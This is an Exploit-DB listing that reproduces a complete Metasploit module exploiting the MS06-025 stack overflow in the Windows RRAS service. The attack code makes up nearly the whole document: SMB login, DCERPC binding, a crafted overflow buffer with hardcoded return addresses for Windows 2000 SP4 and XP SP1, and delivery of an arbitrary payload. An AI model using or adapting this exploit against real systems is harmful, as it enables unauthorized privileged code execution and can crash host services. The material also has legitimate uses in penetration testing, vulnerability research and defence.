Microsoft RRAS Service - Remote Overflow (MS06-025) (Metasploit)

EDB-ID:

16364




Platform:

Windows

Date:

2010-05-09


##
# $Id: ms06_025_rras.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft RRAS Service Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the Windows Routing and Remote
				Access Service. Since the service is hosted inside svchost.exe, a failed
				exploit attempt can cause other system services to fail as well. A valid
				username and password is required to exploit this flaw on Windows 2000.
				When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.			},
			'Author'         =>
				[
					'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>',
					'hdm'
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2006-2370' ],
					[ 'OSVDB', '26437' ],
					[ 'BID', '18325' ],
					[ 'MSB', 'MS06-025' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1104,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP4', { 'Ret' => 0x7571c1e4 } ],
					[ 'Windows XP SP1',   { 'Ret' => 0x7248d4cc } ],
				],

			'DisclosureDate' => 'Jun 13 2006'))

		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']),
			], self.class)
	end

	# Post authentication bugs are rarely useful during automation
	def autofilter
		false
	end

	def exploit

		connect()
		smb_login()

		handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])

		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")


		print_status('Getting OS...')

		# Check the remote OS name and version
		os = smb_peer_os
		pat = ''

		case os
		when /Windows 5\.0/
			pat =
				payload.encoded +
				"\xeb\x06" +
				rand_text_alphanumeric(2) +
				[target.ret].pack('V') +
				"\xe9\xb7\xfb\xff\xff"
			os = 'Windows 2000'
		when /Windows 5\.1/
			pat =
				rand_text_alphanumeric(0x4c) +
				"\xeb\x06" +
				rand_text_alphanumeric(2) +
				[target.ret].pack('V') +
				payload.encoded
			os = 'Windows XP'
		end

		req = [1, 0x49].pack('VV') + pat + rand_text_alphanumeric(0x4000-pat.length)
		len = req.length
		stb =
			NDR.long(0x20000) +
			NDR.long(len) +
			req           +
			NDR.long(len)

		print_status("Calling the vulnerable function on #{os}...")

		begin
			dcerpc.call(0x0C, stb)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		rescue => e
			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
				raise e
			end
		end

		# Cleanup
		handler
		disconnect
	end

end